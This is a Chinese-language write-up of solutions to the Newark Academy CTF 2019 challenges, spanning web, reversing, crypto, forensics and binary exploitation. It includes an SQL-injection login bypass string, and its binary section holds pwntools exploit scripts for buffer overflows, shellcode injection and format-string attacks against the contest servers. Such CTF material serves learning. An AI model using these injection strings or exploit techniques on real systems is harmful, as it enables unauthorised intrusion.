【WriteUp】Newark Academy CTF 2019 题解

Newark Academy CTF 2019 的题解

Web Exploitation

Pink Panther

Description:

Rahul loves the Pink Panther. He even made this website:

http://pinkpanther.web.2019.nactf.com

I think he hid a message somewhere on the webpage, but I don’t know where… can you INSPECT and find the message?

https://www.youtube.com/watch?v=2HMSnfeNf8c

---

Solution:

点开 http://pinkpanther.web.2019.nactf.com 后查看源代码即可

---

Flag:

nactf{1nsp3ct_b3tter_7han_c10us3au}

Scooby Doo

Description:

Kira loves to watch Scooby Doo so much that she made a website about it! She also added a clicker game which looks impossible. Can you use your inspector skills from Pink Panther to reveal the flag?

http://scoobydoo.web.2019.nactf.com

---

Solution:

查看源代码，然后找到<div id="flagContainer">

把里面的 img 标签中写的 css 样式改掉即可，就是删除opacity字段

原图像是透明显示的，改成不透明就行了

---

Flag:

nactf{ult1m4T3_sh4ggY}

Dexter’s Lab

Description:

Dee Dee,

Please check in on your brother’s lab at dexterslab.web.2019.nactf.com We know his username is Dexter, but we don’t know his password! Maybe you can use a SQL injection?

Mom + Dad

---

Solution:

这题用万能密码就能绕过了，在这我用的这种

用户名：1'or'1'or'1
密码：随便输

---

Flag:

nactf{1nj3c7ion5_ar3_saf3_in_th3_l4b}

Sesame Street

Description:

Surprisingly, The20thDuck loves cookies! He also has no idea how to use php. He accidentally messed up a cookie so it’s only available on the countdown page… Also why use cookies in the first place?

sesamestreet.web.2019.nactf.com

---

Solution:

一开始点击 Countdown，用 burp 抓包，看到一个 Cookie

然后点击 Flag，用 burp 抓包，发现提示缺少 Cookie
于是将刚刚得到的 Cookie 输入进去，提示时间还没到，所以我们把时间调大再试

得到 flag

---

Flag:

nactf{c000000000ki3s}

Reverse Engineering

Keygen

Description:

Can you figure out what the key to this program is?

---

Solution:

根据 IDA 给的 flag 内容的加密方式，写了个小程序看看

于是乎写了个程序如下：

#include <stdio.h>

int main(void){
	long long v3 = 0x1371FCAACF98;
	long long chu, yu;
	while(v3){
		printf("%v3 is %lld\n", v3);
		chu = v3 / 62;
		yu = v3 % 62;
		printf("chu is %lld, yu is %lld\n", chu, yu);
		v3 /= 62;
	}
	return 0;
}

对应结果为：

v3 is 21380291284888
chu is 344843407820, yu is 48
v3 is 344843407820
chu is 5561990448, yu is 44
v3 is 5561990448
chu is 89709523, yu is 22
v3 is 89709523
chu is 1446927, yu is 49
v3 is 1446927
chu is 23337, yu is 33
v3 is 23337
chu is 376, yu is 25
v3 is 376
chu is 6, yu is 4
v3 is 6
chu is 0, yu is 6

然后根据 IDA 内部加密方式一个个手动还原就行

第一回要加 6，三个 if 里面能允许加上 6 还不超出界限的只有第一个，以此类推

最后拿到的 ASCII 码为

71 69 90 104 120 87 115 119

---

Flag:

nactf{GEZhxWsw}

General Skills

Intro to Flags

Description:

Your flag is nactf{w3lc0m3_t0_th3_m4tr1x}.

---

Solution:

签到题

---

Flag:

nactf{w3lc0m3_t0_th3_m4tr1x}

Join the Discord

Description:

Go to the NACTF home page and find the link to the Discord server. A flag will be waiting for you once you join. So will Austin.

---

Solution:

进入 Discord 讨论平台即可获得 flag，签到题

---

Flag:

nactf{g00d_luck_h4v3_fun}

What the HEX?

Description:

What the HEX man! My friend Elon just posted this message and I have no idea what it means >:( Please help me decode it:

https://twitter.com/kevinmitnick/status/1028080089592815618?lang=en

Leave the text format: no need to add nactf{} or change punctuation/capitalization

---

Solution:

评论太多，翻半天
最重要的还是赞最多的，给了这样的话，十六进制转 ACSII 走一波就行

49 20 77 61 73 2e 20 53 6f 72 72 79 20 74 6f 20 68 61 76 65 20 6d 69 73 73 65 64 20 79 6f 75 2e

---

Flag:

I was. Sorry to have missed you.

Off-base

Description:

It seems my friend Rohan won’t stop sending cryptic messages and he keeps mumbling something about base 64. Quick! We need to figure out what he is trying to say before he loses his mind…

bmFjdGZ7YV9jaDRuZzNfMGZfYmE1ZX0=

---

Solution:

base64 解密，入门题

---

Flag:

nactf{a_ch4ng3_0f_ba5e}

Cat over the wire

Description:

Open up a terminal and connect to the server at shell.2019.nactf.com on port 31242 and get the flag!

Use this netcat command in terminal:

nc shell.2019.nactf.com 31242

---

Solution:

复制这条命令到 linux 的终端里即可直接得到 flag

---

Flag:

nactf{th3_c4ts_0ut_0f_th3_b4g}

Grace’s HashBrowns

Description:

Grace was trying to make some food for her family but she really messed it up. She was trying to make some hashbrowns but instead, she made this:

f5525fc4fc5fdd42a7cf4f65dc27571c

I guess Grace is a really bad cook. But at least she tried to add some md5 sauce.

remember to put the flag in nactf{….}

---

Solution:

直接去https://www.somd5.com/解密 md5 即可

---

Flag:

nactf{grak}

Cellular Evolution #0: Bellsprout

Description:

Vikram Loves Bio!

He loves it so much that he started growing Cellular Automata in a little jar of his. He hopes his Cellular Automata can be as strong as HeLa Cells. He has so many cells growing that he decided to hire you to help him with his project. Can you open these files and follow Vikram’s instructions?

Use the flag format nactf{…}

---

Solution:

点开 jar 文件，之后按步骤来，输入E然后点击parse，再点击step
之后点击OutPat按钮，会有一个outpattern.txt文件在当前目录下生成
打开文件，内容如下

1 1 . 1 . . . . 1 1 . 1 1 . . . 1 1 . . . . 1 . 1 1 . . . 1 1 . 1 1 . 1 . 1 1 . 1 1 1 . . 1 1

把所有的空格删掉，然后把所有的.改成0
最后利用 ASCII 码找对应的英文字母即可

这比赛好多脑洞题……

---

Flag:

nactf{hlacks}

Get a GREP #0!

Description:

Vikram was climbing a chunky tree when he decided to hide a flag on one of the leaves. There are 10,000 leaves so there’s no way you can find the right one in time… Can you open up a terminal window and get a grep on the flag?

---

Solution:

下载下来有一堆文件，猜测就是建了一堆文件夹让你找 flag 在哪
直接在 cmd 里用一条命令搞定

findstr.exe /s /i "nactf" *.*

---

Flag:

nactf{v1kram_and_h1s_10000_l3av3s}

Hwang’s Hidden Handiwork

Description:

Hwang was trying to hide secret photos from his parents. His mom found a text file with a secret string and an excel chart which she thinks could help you decrypt it. Can you help uncover Hwang’s Handiwork?

Of course, the nobler of you may choose not to do this problem because you respect Hwang’s privacy. That’s ok, but you won’t get the points.

---

Solution:

先写脚本解密

Plaintext = ["a", "b", "c", "d", "e", "f", "g", "h", "i", "j",
             "k", "l", "m", "n", "o", "p", "q", "r", "s", "t",
             "u", "v", "w", "x", "y", "z", "A", "B", "C", "D",
             "E", "F", "G", "H", "I", "J", "K", "L", "M", "N",
             "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X",
             "Y", "Z", "1", "2", "3", "4", "5", "6", "7", "8",
             "9", "0", ".", "/", "-", "_", "=", ":"]
Ciphertext = ["T", "v", "m", "9", "M", "j", "=", "S", "a", "i",
              "w", "k", "e", "C", "P", "L", "X", "D", "J", "c",
              "8", "h", "f", "_", ".", "t", "I", "B", "q", "R",
              "Q", "Z", "U", "n", "K", "u", "l", "E", "-", "7",
              "6", "g", "N", "p", "/", "s", "Y", "3", ":", "4",
              "o", "A", "x", "H", "G", "1", "b", "F", "W", "2",
              "z", "r", "y", "d", "O", "V", "5", "0"]

res = ''
with open('./hwangshandiwork.txt', 'r') as fd:
    line = str(fd.readlines())
    for i in line:
        for j in range(0, len(Ciphertext)):
            if i == Ciphertext[j]:
                res += str(Plaintext[j])
                break
print res

最后的 res 是个网址：

https://lh3.googleusercontent.com/vdx0x3krzzyWWSy4ahxBiWJGdIQR9j0W_tQL_ISoorqnAcIKCIu0Czw-ZbjTZ8eAjlwfLC4Dm6QnSPjx5w=w50-h10-rwH

但是发现最后的=w50-h10-rwH没有用，加上反而访问不了网站
删掉以后可以直接访问到 flag 图片

---

Flag:

nactf{g00gl3_15nt_s3cur3_3n0ugh}

Cellular Evolution #1: Weepinbell

Description:

Apparently, Vikram was not satisfied with your work because he hired a new assistant: Eric. Eric has been doing a great job with managing the cells but he has allergies. Eric sneezed and accidentally messed up the order of the cells. Can you help Eric piece the cells back together?

btw, flag is all lowercase

---

Solution:

题目要求差不多如下，也给判断语句如何写了：

所有值为4的单元格都需要向下右移动，移动之后它们就变成了3
值为3的单元格向左向下移动，变成值为4的单元格
值为1的单元格向上并向右移动，成为值为2的单元格
值为2的单元格向上移动并向左移动，成为值为1的单元格
值为5的单元格保持不变

直接按照要求来写即可

---

Flag:

nactf{ib_bio_ftw}

Get a GREP #1!

Description:

Juliet hid a flag among 100,000 dummy ones so I don’t know which one is real! But maybe the format of her flag is predictable? I know sometimes people add random characters to the end of flags… I think she put 7 random vowels at the end of hers. Can you get a GREP on this flag?

---

Solution:

不太会用正则表达式，写了个很蠢的办法

strings flag.txt | grep [aeiou][aeiou][aeiou][aeiou][aeiou][aeiou][aeiou]}$

---

Flag:

nactf{r3gul4r_3xpr3ss10ns_ar3_m0r3_th4n_r3gul4r_euaiooa}

Cellular Evolution #2: VikTreebel

Description:

Thanks to your help, Eric and Vikram fixed their cells. Business is booming, and they’re now a multinational megacorporation! They need bigger cells to meet demand: Eric used the rule “sum8” to evolve his cells to their next stage of evolution! Sum8 sets each cell to the sum of the cells around it (see examples). Eric sent us his evolved cells, but we want to know what they looked like before! Can you turn back time and get the flag?

---

Solution:

无

---

Flag:

无

SHCALC

Description:

John’s written a handy calculator app - in bash! Too bad it’s not that secure…

Connect at nc shell.2019.nactf.com 31214

---

Solution:

无

---

Flag:

无

Cellular Evolution #3: BBOB

Description:

Dr. J was teaching Linear Algebra when he decided to buy some of Eric and Vik’s cells! He cultivated the cells, drew a secret flag, and performed one step of “sum8”. Luckily, he learned from Eric’s mistake and added random 0’s, 1’s, and 2’s in the background so nobody can reverse the message. Can you still get the flag?

---

Solution:

无

---

Flag:

无

Forensics

Least Significant Avenger

Description:

I hate to say it but I think that Hawkeye is probably the Least Significant avenger. Can you find the flag hidden in this picture?

---

Solution:

LSB 隐写题

---

Flag:

nactf{h4 wk3y3_15_th3_l34 st_51gn1f1c4nt_b 1t}

The MetaMeme

Description:

Phil sent me this meme and its a little but suspicious. The meme is super meta and it may be even more meta than you think.

Wouldn’t it be really cool if it also had a flag hidden somewhere in it? Well you are in luck because it certainly does!

---

Solution:

这题写个命令就行

root@lepPwn:~/CTF/work# strings metametametameta.pdf | grep nactf
/Subject (nactf{d4mn_th15_1s_s0_m3t4})

---

Flag:

nactf{d4mn_th15_1s_s0_m3t4}

My Ears Hurt

Description:

The20thDuck sent me this really annoying audio file. It’s way too high pitched to be his voice. What he is trying to tell me? Maybe its a code; he is the crypto master after all.

You may have to convert file types.

You will need to insert the string into the nactf{…} form before submitting.

---

Solution:

调整波形的大小，便于直观

可以根据该图形写出对应的摩斯密码

-../.----/-../..-/-../-----/-/..../.----/...../-.../-.--/..../....-/-./-..

---

Flag:

nactf{D1DUD0TH15BYH4ND}

Unzip Me

Description:

I stole these files off of The20thDucks’ computer, but it seems he was smart enough to put a password on them. Can you unzip them for me?

---

Solution:

用 Ziperello 解密
第二个密码是 rock
第三个密码是 dog

第一个不能暴力破解，于是找了一个破解网站
https://passwordrecovery.io/zip-file-password-removal/
第一个密码破解出来为 dictionary

---

Flag:

nactf{w0w_y0u_unz1pp3d_m3}

Kellen’s Broken File

Description:

Kellen gave in to the temptation and started playing World of Tanks again. He turned the graphics up so high that something broke on his computer!

Kellen is going to lose his HEAD if he can’t open this file. Please help him fix this broken file.

---

Solution:

少文件头25 50 44 46 2D
补上再打开即可

---

Flag:

nactf{kn0w_y0ur_f1l3_h34d3rsjeklwf}

Kellen’s PDF sandwich

Description:

Kellen was playing some more World of Tanks….

He played so much WOT that he worked up an appetite.

Kellen ripped a PDF in half. He then treated these two halves as bread and placed a different PDF on the inside (yummy PDF meat!). That sounds like one good PDF sandwich. PDF on the outside and inside! YUM!

---

Solution:

无

---

Flag:

无

Filesystem Image

Description:

Put the path to flag.txt together to get the flag! for example, if it was located at ab/cd/ef/gh/ij/flag.txt, your flag would be nactf{abcdefghij}

---

Solution:

在 linux 里的桌面上右键镜像文件，里面有挂载的按钮

解决方法也就是一个命令的事

root@lepPwn:/media/root/EAAD-1BA5# find ./* -name flag.txt
./lq/wk/zo/py/hu/flag.txt
root@lepPwn:/media/root/EAAD-1BA5# cat ./lq/wk/zo/py/hu/flag.txt
They'll never find this! HAhahAHahAHAHaHAHAHAA
>:)

---

Flag:

nactf{lqwkzopyhu}

Phuzzy Photo

Description:

Joyce’s friend just sent her this photo, but it’s really fuzzy. She has no idea what the message says but she thinks she can make out some black text in the middle. She gave the photo to Oligar, but even his super eyes couldn’t read the text. Maybe you can write some code to find the message?

Also, you might have to look at your screen from an angle to see the blurry hidden text

P.S. Joyce’s friend said that part of the message is hidden in every 6th pixel

---

Solution:

无

---

Flag:

无

File recovery

Description:

Uh oh! Lillian has accidentally deleted everything on her flash drive! Here’s an image of the drive; find the PNG and get the flag.

---

Solution:

原本以为很难，结果在 linux 里用 foremost 命令直接拿到了 flag

---

Flag:

nactf{f1l3_r3c0v3ry_15_c0ol}

Cryptography

Vyom’s Soggy Croutons

Description:

Vyom was eating a CAESAR salad with a bunch of wet croutons when he sent me this:

ertkw{vk_kl_silkv}

Can you help me decipher his message?

---

Solution:

正常的凯撒加密

---

Flag:

nactf{et_tu_brute}

Loony Tunes

Description:

Ruthie is very inhumane. She keeps her precious pigs locked up in a pen. I heard that this secret message is the password to unlocking the gate to her PIGPEN. Unfortunately, Ruthie does not want people unlocking the gate so she encoded the password. Please help decrypt this code so that we can free the pigs!

P.S. “_” , “{“ , and “}” are not part of the cipher and should not be changed

P.P.S the flag is all lowercase

---

Solution:

猪圈密码

---

Flag:

nactf{th_th_th_thats_all_folks}

Dr. J’s Group Test Randomizer: Board Problem #0

Description:

Dr. J created a fast pseudorandom number generator (prng) to randomly assign pairs for the upcoming group test. Leaf really wants to know the pairs ahead of time… can you help him and predict the next output of Dr. J’s prng? Leaf is pretty sure that Dr. J is using the middle-square method.

nc shell.2019.nactf.com 31425

The server is running the code in class-randomizer-0.c. Look at the function nextRand() to see how numbers are being generated!

---

Solution:

无

---

Flag:

无

Reversible Sneaky Algorithm #0

Description:

Yavan sent me these really large numbers… what can they mean? He sent me the cipher “c”, the private key “d”, and the public modulus “n”. I also know he converted his message to a number with ascii. For example:

“nactf” –> \x6e61637466 –> 474080310374

Can you help me decrypt his cipher?

---

Solution:

给了 n，d，c 等于给了答案，直接脚本就完了

exp如下：

import gmpy2
import rsa
import binascii

n = gmpy2.mpz(140971369982728290584003929856637011308685429687969594429997821710108459830116393789723684079062708514036299475509430542212659734507429142853158004794834935174746493412962154796160975546005828130717579132438781804174244070129160649779404165370266408790722528108474736698480388956217393838955462967989235557729)
d = gmpy2.mpz(3210396717872682205420233842120187670754123682946955455494937957220148561826887372494355836977601850209792589944578254791223196877372140862540829182847721214418314564429696694983379689813325142035328881707722441498876726169675843996078221651180111278667814216844121752144791638682520989591783787929482763483)
c = gmpy2.mpz(7597447581111665937753781070914281099248138767561231457808924842755340796976767584904483452403406793827996034815852778012984740739361969304711271790657255334745163889379518040725967970769121270606356380463906882556650693485795903105298437519246733021136433493998710761239540681944709850299154477898517149127)
m = pow(c, d, n)
m_hex = hex(m)[2:]
print "ascii:\n%s"%(binascii.a2b_hex(m_hex).decode("utf8"))

---

Flag:

nactf{w3lc0me_t0_numb3r_th30ry}

Super Duper AES

Description:

The Advanced Encryption Standard (AES) has got to go. Spencer just invented the Super Duper Advanced Encryption Standard (SDAES), and it’s 100% unbreakable. AES only performs up to 14 rounds of substitution and permutation, while SDAES performs 10,000. That’s so secure, SDAES doesn’t even use a key!

---

Solution:

无

---

Flag:

无

Reversible Sneaky Algorithm #1

Description:

Lori decided to implement RSA without any security measures like random padding. Must be deterministic then, huh? Silly goose!

She encrypted a message of the form nactf{****} where the redacted flag is a string of 4 lowercase alphabetical characters. Can you decrypt it?

As in the previous problem, the message is converted to a number by converting ascii to hex.

---

Solution:

这题没说明白，我一开始以为是只爆破nactf{和}内的内容

但其实爆破的时候也需要把他们加上

以下是爆破脚本

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import gmpy2
import binascii

n = gmpy2.mpz(22211149480575639993429030519324903433947913532364781040868963328192510711356813047019777682976897694523708823502748768149007288902843985412808705624398873301639600888468250478096471710461804856036409585519537946352413960371213677893523940481424813184421465313214067723492301317054407961642320909213358344993453825109139928083868146685834149311590508677641684185974469669019522897333475910002506624356655715375691861599282035176111228787146595035293770294934083506588432931535561733381730924617763450268288785249430304809062568532772866407535937947253602671915278827388538023000320823892308918791287865032550658101647)
e = gmpy2.mpz(65537)
c = gmpy2.mpz(17092019895398435490936645877681389522100314381280314137324590582626113380519883878346612680436149571504342956062627199254592419000136198748264157134720216337534802137245374257104787163473593768075381161119603573787923015405105192411372689756878820005036480013443173993126005361536816259899310244534769833694660355126920566669139672444357708161337389888825104348833002955918763849005061351140425567156148202269336347554989169075541289307981444741551677799416273481457219933391047628725337828725080079301570909831609401028488393457876225318163558871115320155827798534306397644894097358075465535794590825299057956641732)

char = 'nactf{'
for i in range(97, 123):
    char += chr(i)
    for j in range(97, 123):
        char += chr(j)
        for k in range(97, 123):
            char += chr(k)
            for l in range(97, 123):
                char += chr(l)
                char += '}'
                m = binascii.b2a_hex(char)
                testc = gmpy2.powmod(int(m, 16), e, n)
                if testc == c:
                    print binascii.a2b_hex(m).decode("utf8")
                    exit(0)
                char = char[:-2]
            char = char[:-1]
        char = char[:-1]
    char = char[:-1]
char = char[:-1]

---

Flag:

nactf{pkcs}

Dr. J’s Group Test Randomizer: Board Problem #1

Description:

Dr. J is back with another group test, and he patched his prng so we can’t predict the next number based on the previous one! Can still you help Leaf predict the next output of the prng?

nc shell.2019.nactf.com 31258

---

Solution:

无

---

Flag:

无

Reversible Sneaky Algorithm #2

Description:

Oligar was thinking about number theory at AwesomeMath when he decided to encrypt a message with RSA. As a mathematician, he made various observations about the numbers. He told Molly one such observation:

a^r ≡ 1 (mod n)

He isn’t SHOR if he accidentally revealed anything by telling Molly this fact… can you decrypt his message?

Source code, a and r, public key, and ciphertext are attached.

---

Solution:

无

---

Flag:

无

Dr. J’s Group Test Randomizer #2: BBOB

Description:

This is it. The last group test of the year. Dr. J patched his prng again so numbers won’t repeat, so I guess Leaf won’t get to know the group test pairs ahead of time… oh WEYL. Who knew middle square could make such a good prng?

nc shell.2019.nactf.com 31382

---

Solution:

无

---

Flag:

无

Binary Exploitation

BufferOverflow #0

Description:

The close cousin of a website for “Question marked as duplicate”

Can you cause a segfault and get the flag?

shell.2019.nactf.com:31475

---

Solution:

覆盖 ret 到 win 函数地址即可

exp如下：

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *

# context(log_level="debug", arch="i386", os="linux")
# p = process('./bufover-0')
p = remote('shell.2019.nactf.com', 31475)
elf = ELF('./bufover-0', checksec=False)
addr_win = elf.sym['win']

pd = 'a' * 0x1c
pd += p32(addr_win)
p.sendline(pd)

p.interactive()

---

Flag:

nactf{0v3rfl0w_th4at_buff3r_18ghKusB}

BufferOverflow #1

Description:

The close cousin of a website for “Question marked as duplicate” - part 2!

Can you redirect code execution and get the flag?

Connect at shell.2019.nactf.com:31462

---

Solution:

还是覆盖 ret 为 win 函数地址即可

exp如下：

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *

# context(log_level="debug", arch="i386", os="linux")
# p = process('./bufover-1')
p = remote('shell.2019.nactf.com', 31462)
elf = ELF('./bufover-1', checksec=False)
addr_win = elf.sym['win']

pd = 'a' * 0x1c
pd += p32(addr_win)
p.sendline(pd)
p.sendline('')
p.interactive()

---

Flag:

nactf{pwn_31p_0n_r3t_iNylg281}

BufferOverflow #2

Description:

The close cousin of a website for “Question marked as duplicate” - part 3!

Can you control the arguments to win() and get the flag?

Connect at shell.2019.nactf.com:31184

---

Solution:

一开始其实真不知道咋做了，当然也是自己在传参这太菜

不过之后 checksec 发现这题开了栈可执行

果断 shellcode

exp如下：

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
from LibcSearcher import *

# context(log_level="debug", arch="", os="linux")
# p = process('./bufover-2')
p = remote('shell.2019.nactf.com', 31184)
elf = ELF('./bufover-2', checksec=False)
addr_vuln = 0x08049293
addr_bss = elf.bss()
plt_gets = elf.plt['gets']

pd = 'a' * 0x1c
pd += p32(plt_gets)
pd += p32(addr_vuln)
pd += p32(addr_bss + 4)
p.sendline(pd)

pd = asm(shellcraft.sh())
# gdb.attach(p, "b *0x080492CD\nc")
p.sendline(pd)
p.sendline('')
p.recv()
p.interactive()

---

Flag:

nactf{PwN_th3_4rG5_T0o_Ky3v7Ddg}

Format #0

Description:

Someone didn’t tell Chaddha not to give user input as the first argument to printf() - use it to leak the flag!

Connect at shell.2019.nactf.com:31782

---

Solution:

题目说是格式化字符串漏洞那就先测测能利用的漏洞点

然后可以看到在格式化字符串的第 24 个参数处直接显示了 flag

所以直接打印即可

最后的效果图：

exp如下：

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *

# context(log_level="debug", arch="i386", os="linux")
# p = process('./format-0')
p = remote('shell.2019.nactf.com', 31782)
# gdb.attach(p, "b *0x080491F6\nc\nsi")

pd = '%24$s'
p.sendline(pd)
p.recvuntil('You typed: ')
p.interactive()

---

Flag:

nactf{Pr1ntF_L34k_m3m0ry_r34d_nM05f469}

Format #1

Description:

printf can do more than just read memory… can you change the variable?

Connect at nc shell.2019.nactf.com 31560

---

Solution:

就是爆破了一下在 IDA 的 main 函数里的 v4 的位置

因为覆盖到了肯定会报错，然后直接改即可

exp如下：

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *

# context(log_level="debug", arch="i386", os="linux")
# p = process('./format-1')
p = remote('shell.2019.nactf.com', 31560)
# gdb.attach(p, "b *0x08049266\nc\nsi")

pd = '%42d%24$n'
p.sendline(pd)

p.interactive()

---

Flag:

nactf{Pr1ntF_wr1t3s_t0o_rZFCUmba}

Loopy #0

Description:

This program is quite short, but has got printf and gets in it! This shouldn’t be too hard, right?

Connect at nc shell.2019.nactf.com 31283

---

Solution:

Loopy #0 和 Loopy #1 在本地改掉 LD_PRELOAD 也无法运行，直接段错误
在网上也没搜到对应的 libc ，不知道怎么搞……貌似只能远程打

---

Flag:

无

Loopy #1

Description:

Same program as Loopy #0, but someone’s turned on the stack protector now!

Connect at nc shell.2019.nactf.com 31732

---

Solution:

无

---

Flag:

无